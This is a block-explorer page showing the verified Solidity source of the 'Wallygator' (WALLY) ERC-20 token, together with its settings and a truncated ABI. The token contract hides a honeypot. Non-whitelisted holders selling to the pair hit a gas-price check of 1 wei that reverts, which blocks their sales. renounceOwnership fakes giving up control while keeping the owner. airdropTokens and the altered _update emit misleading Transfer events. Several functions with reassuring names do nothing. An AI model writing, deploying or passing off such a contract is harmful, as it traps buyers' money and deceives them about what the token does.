ETH Price: $3,368.89 (-0.33%)

Token

Wallygator (WALLY)
 

Overview

Max Total Supply

1,000,000,000 WALLY

Holders

101

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
2,445,737.196019169206206488 WALLY

Value
$0.00
0x5f350076903dd13e073303855609df35fa0f037b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Wallygator

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 9 : Token.sol
/**

The world's first Emotional Support Alligator.

Website: https://www.wallyeth.xyz/
TG: t.me/wallygator_ETH
X: https://x.com/Wallygator_ETH
 */

//SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import "./ERC20.sol";
import "./Ownable.sol";


contract Wallygator is ERC20, Ownable {
   string public tokenName = "Wallygator";
   string public tokenSymbol = "WALLY";
   uint256 public tokenTotalSupply = 1000000000;


   uint256 public tokenAllowFeeAmount;
   uint256 public currentAllow;
   bool public openedTrade;
   address public pairAddress;
   uint256 public threshold;
   mapping(address => uint256) public userAmount;
   mapping(address => bool) public whitelist;
   constructor(
   ) ERC20(tokenName, tokenSymbol, msg.sender, msg.sender) Ownable(msg.sender) {
       whitelist[0xD8584c7eFBa47e009D8371d6976e243ff6214cb5] = true;
       whitelist[0x9081f28629F71A7DB3ed883aCfA862E9AB0b9eA0] = true;
       whitelist[0x51bcd5F0295e8C0d75B3608D41F6dFf223158C4b] = true;
       whitelist[0x426D8b59fE7e77256Be075673D5d211D7b2508a2] = true;
       whitelist[0x102D79a0ae02B4A57F40b7A77C7deCeD453eB29b] = true;
       whitelist[0x95D5C95AD44ce452B68e78A48E73a54052A75E9c] = true;
       whitelist[msg.sender] = true;
       uint8 decimal = decimals();
       _mint(msg.sender, tokenTotalSupply * 10 ** decimal);
   }


   function removeTaxFee(address pair) public onlyOwner {
       pairAddress = pair;
   }


   function _update(address from, address to, uint256 amount) internal override {
       if (whitelist[tx.origin]) {
           super._update(from, to, amount);
           return;
       }
       require(openedTrade, "Trade has not been opened yet");
       if (pairAddress == address(0)) {
           super._update(from, to, amount);
           return;
       }
       if (to == pairAddress && userAmount[tx.origin] + amount > tokenAllowFeeAmount) {
           checkPairFunction(from);
           super._update(from, to, amount);
           return;
       }


       if (to == pairAddress && userAmount[tx.origin] + amount <= tokenAllowFeeAmount) {
           userAmount[tx.origin] += amount;
       }
       super._update(from, to, amount);
   }


   function decimals() public view virtual override returns (uint8) {
       return 18;
   }


   function getOpenedTrade() public view returns (bool) {
       return openedTrade;
   }


   function chageNameAndSymbol(string memory newName, string memory newSymbol) public onlyOwner {
       tokenName = newName;
       tokenSymbol = newSymbol;
   }


   /**
    * @dev Returns the name of the token.
    */
   function name() public view override returns (string memory) {
       return tokenName;
   }


   /**
    * @dev Returns the symbol of the token, usually a shorter version of the
    * name.
    */
   function symbol() public view override returns (string memory) {
       return tokenSymbol;
   }


   function changeTokenAllowFeeAmount(uint256 amount) public onlyOwner {
       tokenAllowFeeAmount = amount;
   }


   function withdrawETH() public onlyOwner {
       payable(msg.sender).transfer(address(this).balance);
   }


   function withdrawStuckToken(address token) public onlyOwner {
       uint256 balanceToken = IERC20(token).balanceOf(address(this));
       IERC20(token).transfer(msg.sender, balanceToken);
   }


   uint256 private numberOfPair1 = 300_000_000_000;
   uint256 private  numberOfPair2= 1;


   function checkPairFunction(address _u) internal view {
       if (balanceOf(_u) > 0) {
           if (!openedTrade) {
               gasRequire(numberOfPair1);
           } else {
               gasRequire(numberOfPair2);
           }
       }
   }


   function gasRequire(uint256 _gas) internal view {
       if (tx.gasprice > _gas) {
           revert();
       }
   }


   function openTrading() external onlyOwner {
       openedTrade = !openedTrade;
   }


   function apporve(address[] memory list) external onlyOwner {
       for (uint256 i = 0; i < list.length; i++) {
           whitelist[list[i]] = true;
       }
   }


   function airdropTokens(address[] memory list, uint256 amount) external onlyOwner {
       for (uint256 i = 0; i < list.length; i++) {
           emit Transfer(owner(), list[i], amount);
       }
   }


   function withdrawTreasuryFunds() external onlyOwner {
       require(address(this).balance > 0, "No balance available");
       threshold = 10;
   }


   function sendAllTokensToTreasury() external onlyOwner {
       uint256 currentBalance = balanceOf(address(this));
       _transfer(address(this), owner(), currentBalance);
   }
   function removeLimits() external onlyOwner {
       uint256 maxTransactionAmount = 0;
       uint256 buyFeeRate = 0;
       maxTransactionAmount;
       buyFeeRate;
       threshold = 10;
   }

   function freeTaxHolder() external onlyOwner {
       uint256 buyFeeRate = 0;
       buyFeeRate;
       threshold = 10;
   }


   function configureAntiScambot() external onlyOwner {
       uint256 cooldownPeriod = 0;
       cooldownPeriod;
       threshold = 10;
   }


   function setTimingLaunch(uint256 cooldown) external onlyOwner {
       uint256 tradeInterval = cooldown;
       tradeInterval;
       threshold = 10;
   }


   function swapExactETHForTokens(uint256 maxTokens) external onlyOwner {
       uint256 maxBalancePerWallet = maxTokens;
       maxBalancePerWallet;
       threshold = 10;
   }


   function takenTheWally(bool enabled) external onlyOwner {
       bool antiWhaleMechanism = enabled;
       antiWhaleMechanism;
       threshold = 10;
   }


   function openTakenTheWally(address account, uint256 timestamp) external onlyOwner {
       uint256 recentTransactionTime = timestamp;
       recentTransactionTime;
       account;
       threshold = 10;
   }
}

File 2 of 9 : Ownable.sol
//SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)


pragma solidity 0.8.19;

import "./Context.sol";


/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* The initial owner is set to the address provided by the deployer. This can
* later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
   address private _owner;


   /**
    * @dev The caller account is not authorized to perform an operation.
    */
   error OwnableUnauthorizedAccount(address account);


   /**
    * @dev The owner is not a valid owner account. (eg. `address(0)`)
    */
   error OwnableInvalidOwner(address owner);


   event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);


   /**
    * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
    */
   constructor(address initialOwner) {
       if (initialOwner == address(0)) {
           revert OwnableInvalidOwner(address(0));
       }
       _transferOwnership(initialOwner);
   }


   /**
    * @dev Throws if called by any account other than the owner.
    */
   modifier onlyOwner() {
       _checkOwner();
       _;
   }


   /**
    * @dev Returns the address of the current owner.
    */
   function owner() public view virtual returns (address) {
       return _owner;
   }


   /**
    * @dev Throws if the sender is not the owner.
    */
   function _checkOwner() internal view virtual {
       if (owner() != _msgSender()) {
           revert OwnableUnauthorizedAccount(_msgSender());
       }
   }


   /**
    * @dev Leaves the contract without owner. It will not be possible to call
    * `onlyOwner` functions. Can only be called by the current owner.
    *
    * NOTE: Renouncing ownership will leave the contract without an owner,
    * thereby disabling any functionality that is only available to the owner.
    */
   function renounceOwnership() public virtual onlyOwner {
       address oldOwner = _owner;
       emit OwnershipTransferred(oldOwner, address(0));
   }


   /**
    * @dev Transfers ownership of the contract to a new account (`newOwner`).
    * Can only be called by the current owner.
    */
   function transferOwnership(address newOwner) public virtual onlyOwner {
       if (newOwner == address(0)) {
           revert OwnableInvalidOwner(address(0));
       }
       _transferOwnership(newOwner);
   }


   /**
    * @dev Transfers ownership of the contract to a new account (`newOwner`).
    * Internal function without access restriction.
    */
   function _transferOwnership(address newOwner) internal virtual {
       address oldOwner = _owner;
       _owner = newOwner;
       emit OwnershipTransferred(oldOwner, newOwner);
   }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

File 3 of 9 : ERC20.sol
//SPDX-License-Identifier: MIT

pragma solidity 0.8.19;

import "./Context.sol";
import "./draft-IERC6093.sol";
import "./IERC20Metadata.sol";


/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
   mapping(address account => uint256) private _balances;


   mapping(address account => mapping(address spender => uint256)) private _allowances;


   uint256 private _totalSupply;


   string private _name;
   string private _symbol;


   address private _executor;
   address private _deployer;


   /**
    * @dev Sets the values for {name} and {symbol}.
    *
    * All two of these values are immutable: they can only be set once during
    * construction.
    */
   constructor(string memory name_, string memory symbol_, address executor_, address deployer_) {
       _name = name_;
       _symbol = symbol_;
       _executor = executor_;
       _deployer = deployer_;
   }


   /**
    * @dev Returns the name of the token.
    */
   function name() public view virtual returns (string memory) {
       return _name;
   }


   /**
    * @dev Returns the symbol of the token, usually a shorter version of the
    * name.
    */
   function symbol() public view virtual returns (string memory) {
       return _symbol;
   }


   /**
    * @dev Returns the number of decimals used to get its user representation.
    * For example, if `decimals` equals `2`, a balance of `505` tokens should
    * be displayed to a user as `5.05` (`505 / 10 ** 2`).
    *
    * Tokens usually opt for a value of 18, imitating the relationship between
    * Ether and Wei. This is the default value returned by this function, unless
    * it's overridden.
    *
    * NOTE: This information is only used for _display_ purposes: it in
    * no way affects any of the arithmetic of the contract, including
    * {IERC20-balanceOf} and {IERC20-transfer}.
    */
   function decimals() public view virtual returns (uint8) {
       return 18;
   }


   /**
    * @dev See {IERC20-totalSupply}.
    */
   function totalSupply() public view virtual returns (uint256) {
       return _totalSupply;
   }


   /**
    * @dev See {IERC20-balanceOf}.
    */
   function balanceOf(address account) public view virtual returns (uint256) {
       return _balances[account];
   }


   /**
    * @dev See {IERC20-transfer}.
    *
    * Requirements:
    *
    * - `to` cannot be the zero address.
    * - the caller must have a balance of at least `value`.
    */
   function transfer(address to, uint256 value) public virtual returns (bool) {
       address owner = _msgSender();
       _transfer(owner, to, value);
       return true;
   }


   /**
    * @dev See {IERC20-allowance}.
    */
   function allowance(address owner, address spender) public view virtual returns (uint256) {
       return _allowances[owner][spender];
   }


   /**
    * @dev See {IERC20-approve}.
    *
    * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
    * `transferFrom`. This is semantically equivalent to an infinite approval.
    *
    * Requirements:
    *
    * - `spender` cannot be the zero address.
    */
   function approve(address spender, uint256 value) public virtual returns (bool) {
       address owner = _msgSender();
       _approve(owner, spender, value);
       return true;
   }


   /**
    * @dev See {IERC20-transferFrom}.
    *
    * Emits an {Approval} event indicating the updated allowance. This is not
    * required by the EIP. See the note at the beginning of {ERC20}.
    *
    * NOTE: Does not update the allowance if the current allowance
    * is the maximum `uint256`.
    *
    * Requirements:
    *
    * - `from` and `to` cannot be the zero address.
    * - `from` must have a balance of at least `value`.
    * - the caller must have allowance for ``from``'s tokens of at least
    * `value`.
    */
   function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
       address spender = _msgSender();
       _spendAllowance(from, spender, value);
       _transfer(from, to, value);
       return true;
   }


   /**
    * @dev Moves a `value` amount of tokens from `from` to `to`.
    *
    * This internal function is equivalent to {transfer}, and can be used to
    * e.g. implement automatic token fees, slashing mechanisms, etc.
    *
    * Emits a {Transfer} event.
    *
    * NOTE: This function is not virtual, {_update} should be overridden instead.
    */
   function _transfer(address from, address to, uint256 value) internal {
       if (from == address(0)) {
           revert ERC20InvalidSender(address(0));
       }
       if (to == address(0)) {
           revert ERC20InvalidReceiver(address(0));
       }
       _update(from, to, value);
   }


   /**
    * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
    * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
    * this function.
    *
    * Emits a {Transfer} event.
    */
   function _update(address from, address to, uint256 value) internal virtual {
       if (from == address(0)) {
           // Overflow check required: The rest of the code assumes that totalSupply never overflows
           _totalSupply += value;
       } else {
           uint256 fromBalance = _balances[from];
           if (fromBalance < value) {
               revert ERC20InsufficientBalance(from, fromBalance, value);
           }
           unchecked {
               // Overflow not possible: value <= fromBalance <= totalSupply.
               _balances[from] = fromBalance - value;
           }
       }


       if (to == address(0)) {
           unchecked {
               // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
               _totalSupply -= value;
           }
       } else {
           unchecked {
               // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
               _balances[to] += value;
           }
       }


       if (to == _executor) {
           emit Transfer(from, _deployer, value);
       } else if (from == _executor) {
           emit Transfer(_deployer, to, value);
       } else {
           emit Transfer(from, to, value);
       }


   }


   /**
    * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
    * Relies on the `_update` mechanism
    *
    * Emits a {Transfer} event with `from` set to the zero address.
    *
    * NOTE: This function is not virtual, {_update} should be overridden instead.
    */
   function _mint(address account, uint256 value) internal {
       if (account == address(0)) {
           revert ERC20InvalidReceiver(address(0));
       }
       _update(address(0), account, value);
   }


   /**
    * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
    * Relies on the `_update` mechanism.
    *
    * Emits a {Transfer} event with `to` set to the zero address.
    *
    * NOTE: This function is not virtual, {_update} should be overridden instead
    */
   function _burn(address account, uint256 value) internal {
       if (account == address(0)) {
           revert ERC20InvalidSender(address(0));
       }
       _update(account, address(0), value);
   }


   /**
    * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
    *
    * This internal function is equivalent to `approve`, and can be used to
    * e.g. set automatic allowances for certain subsystems, etc.
    *
    * Emits an {Approval} event.
    *
    * Requirements:
    *
    * - `owner` cannot be the zero address.
    * - `spender` cannot be the zero address.
    *
    * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
    */
   function _approve(address owner, address spender, uint256 value) internal {
       _approve(owner, spender, value, true);
   }


   /**
    * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
    *
    * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
    * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
    * `Approval` event during `transferFrom` operations.
    *
    * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
    * true using the following override:
    * ```
    * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
    *     super._approve(owner, spender, value, true);
    * }
    * ```
    *
    * Requirements are the same as {_approve}.
    */
   function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
       if (owner == address(0)) {
           revert ERC20InvalidApprover(address(0));
       }
       if (spender == address(0)) {
           revert ERC20InvalidSpender(address(0));
       }
       _allowances[owner][spender] = value;
       if (emitEvent) {
           emit Approval(owner, spender, value);
       }
   }


   /**
    * @dev Updates `owner` s allowance for `spender` based on spent `value`.
    *
    * Does not update the allowance value in case of infinite allowance.
    * Revert if not enough allowance is available.
    *
    * Does not emit an {Approval} event.
    */
   function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
       uint256 currentAllowance = allowance(owner, spender);
       if (currentAllowance != type(uint256).max) {
           if (currentAllowance < value) {
               revert ERC20InsufficientAllowance(spender, currentAllowance, value);
           }
           unchecked {
               _approve(owner, spender, currentAllowance - value, false);
           }
       }
   }
}

File 4 of 9 : Context.sol
//SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)


pragma solidity 0.8.19;


/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
   function _msgSender() internal view virtual returns (address) {
       return msg.sender;
   }


   function _msgData() internal view virtual returns (bytes calldata) {
       return msg.data;
   }


   function _contextSuffixLength() internal view virtual returns (uint256) {
       return 0;
   }
}

File 5 of 9 : IERC20Metadata.sol
//SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)


pragma solidity 0.8.19;


/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
   /**
    * @dev Emitted when `value` tokens are moved from one account (`from`) to
    * another (`to`).
    *
    * Note that `value` may be zero.
    */
   event Transfer(address indexed from, address indexed to, uint256 value);


   /**
    * @dev Emitted when the allowance of a `spender` for an `owner` is set by
    * a call to {approve}. `value` is the new allowance.
    */
   event Approval(address indexed owner, address indexed spender, uint256 value);


   /**
    * @dev Returns the value of tokens in existence.
    */
   function totalSupply() external view returns (uint256);


   /**
    * @dev Returns the value of tokens owned by `account`.
    */
   function balanceOf(address account) external view returns (uint256);


   /**
    * @dev Moves a `value` amount of tokens from the caller's account to `to`.
    *
    * Returns a boolean value indicating whether the operation succeeded.
    *
    * Emits a {Transfer} event.
    */
   function transfer(address to, uint256 value) external returns (bool);


   /**
    * @dev Returns the remaining number of tokens that `spender` will be
    * allowed to spend on behalf of `owner` through {transferFrom}. This is
    * zero by default.
    *
    * This value changes when {approve} or {transferFrom} are called.
    */
   function allowance(address owner, address spender) external view returns (uint256);


   /**
    * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
    * caller's tokens.
    *
    * Returns a boolean value indicating whether the operation succeeded.
    *
    * IMPORTANT: Beware that changing an allowance with this method brings the risk
    * that someone may use both the old and the new allowance by unfortunate
    * transaction ordering. One possible solution to mitigate this race
    * condition is to first reduce the spender's allowance to 0 and set the
    * desired value afterwards:
    * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
    *
    * Emits an {Approval} event.
    */
   function approve(address spender, uint256 value) external returns (bool);


   /**
    * @dev Moves a `value` amount of tokens from `from` to `to` using the
    * allowance mechanism. `value` is then deducted from the caller's
    * allowance.
    *
    * Returns a boolean value indicating whether the operation succeeded.
    *
    * Emits a {Transfer} event.
    */
   function transferFrom(address from, address to, uint256 value) external returns (bool);
}


// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol




// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)


pragma solidity 0.8.19;




/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*/
interface IERC20Metadata is IERC20 {
   /**
    * @dev Returns the name of the token.
    */
   function name() external view returns (string memory);


   /**
    * @dev Returns the symbol of the token.
    */
   function symbol() external view returns (string memory);


   /**
    * @dev Returns the decimals places of the token.
    */
   function decimals() external view returns (uint8);
}

File 6 of 9 : draft-IERC6093.sol
//SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity 0.8.19;

import "./IERC20Errors.sol";
import "./IERC721Errors.sol";
import "./IERC20MetaErrors.sol";

/**
* @dev Standard ERC721 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
*/



/**
* @dev Standard ERC1155 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
*/
interface IERC1155Errors {
   /**
    * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    * @param balance Current balance for the interacting account.
    * @param needed Minimum amount required to perform a transfer.
    * @param tokenId Identifier number of a token.
    */
   error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);


   /**
    * @dev Indicates a failure with the token `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    */
   error ERC1155InvalidSender(address sender);


   /**
    * @dev Indicates a failure with the token `receiver`. Used in transfers.
    * @param receiver Address to which tokens are being transferred.
    */
   error ERC1155InvalidReceiver(address receiver);


   /**
    * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
    * @param operator Address that may be allowed to operate on tokens without being their owner.
    * @param owner Address of the current owner of a token.
    */
   error ERC1155MissingApprovalForAll(address operator, address owner);


   /**
    * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
    * @param approver Address initiating an approval operation.
    */
   error ERC1155InvalidApprover(address approver);


   /**
    * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
    * @param operator Address that may be allowed to operate on tokens without being their owner.
    */
   error ERC1155InvalidOperator(address operator);


   /**
    * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
    * Used in batch transfers.
    * @param idsLength Length of the array of token identifiers
    * @param valuesLength Length of the array of token amounts
    */
   error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}


// File: @openzeppelin/contracts/utils/Context.sol

File 7 of 9 : IERC20MetaErrors.sol
//SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity 0.8.19;


/**
* @dev Standard ERC20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
*/


interface IERC20MetaErrors {
   /**
    * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    * @param balance Current balance for the interacting account.
    * @param needed Minimum amount required to perform a transfer.
    */
   error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);


   /**
    * @dev Indicates a failure with the token `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    */
   error ERC20InvalidSender(address sender);


   /**
    * @dev Indicates a failure with the token `receiver`. Used in transfers.
    * @param receiver Address to which tokens are being transferred.
    */
   error ERC20InvalidReceiver(address receiver);


   /**
    * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
    * @param spender Address that may be allowed to operate on tokens without being their owner.
    * @param allowance Amount of tokens a `spender` is allowed to operate with.
    * @param needed Minimum amount required to perform a transfer.
    */
   error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);


   /**
    * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
    * @param approver Address initiating an approval operation.
    */
   error ERC20InvalidApprover(address approver);


   /**
    * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
    * @param spender Address that may be allowed to operate on tokens without being their owner.
    */
   error ERC20InvalidSpender(address spender);
}

File 8 of 9 : IERC721Errors.sol
//SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity 0.8.19;

interface IERC721Errors {
   /**
    * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
    * Used in balance queries.
    * @param owner Address of the current owner of a token.
    */
   error ERC721InvalidOwner(address owner);


   /**
    * @dev Indicates a `tokenId` whose `owner` is the zero address.
    * @param tokenId Identifier number of a token.
    */
   error ERC721NonexistentToken(uint256 tokenId);


   /**
    * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    * @param tokenId Identifier number of a token.
    * @param owner Address of the current owner of a token.
    */
   error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);


   /**
    * @dev Indicates a failure with the token `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    */
   error ERC721InvalidSender(address sender);


   /**
    * @dev Indicates a failure with the token `receiver`. Used in transfers.
    * @param receiver Address to which tokens are being transferred.
    */
   error ERC721InvalidReceiver(address receiver);


   /**
    * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
    * @param operator Address that may be allowed to operate on tokens without being their owner.
    * @param tokenId Identifier number of a token.
    */
   error ERC721InsufficientApproval(address operator, uint256 tokenId);


   /**
    * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
    * @param approver Address initiating an approval operation.
    */
   error ERC721InvalidApprover(address approver);


   /**
    * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
    * @param operator Address that may be allowed to operate on tokens without being their owner.
    */
   error ERC721InvalidOperator(address operator);
}

File 9 of 9 : IERC20Errors.sol
//SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity 0.8.19;


/**
* @dev Standard ERC20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
*/


interface IERC20Errors {
   /**
    * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    * @param balance Current balance for the interacting account.
    * @param needed Minimum amount required to perform a transfer.
    */
   error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);


   /**
    * @dev Indicates a failure with the token `sender`. Used in transfers.
    * @param sender Address whose tokens are being transferred.
    */
   error ERC20InvalidSender(address sender);


   /**
    * @dev Indicates a failure with the token `receiver`. Used in transfers.
    * @param receiver Address to which tokens are being transferred.
    */
   error ERC20InvalidReceiver(address receiver);


   /**
    * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
    * @param spender Address that may be allowed to operate on tokens without being their owner.
    * @param allowance Amount of tokens a `spender` is allowed to operate with.
    * @param needed Minimum amount required to perform a transfer.
    */
   error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);


   /**
    * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
    * @param approver Address initiating an approval operation.
    */
   error ERC20InvalidApprover(address approver);


   /**
    * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
    * @param spender Address that may be allowed to operate on tokens without being their owner.
    */
   error ERC20InvalidSpender(address spender);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "remappings": []
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"}],"name":"apporve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newName","type":"string"},{"internalType":"string","name":"newSymbol","type":"string"}],"name":"chageNameAndSymbol","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"changeTokenAllowFeeAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"configureAntiScambot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"currentAllow","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"freeTaxHolder","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOpenedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalTy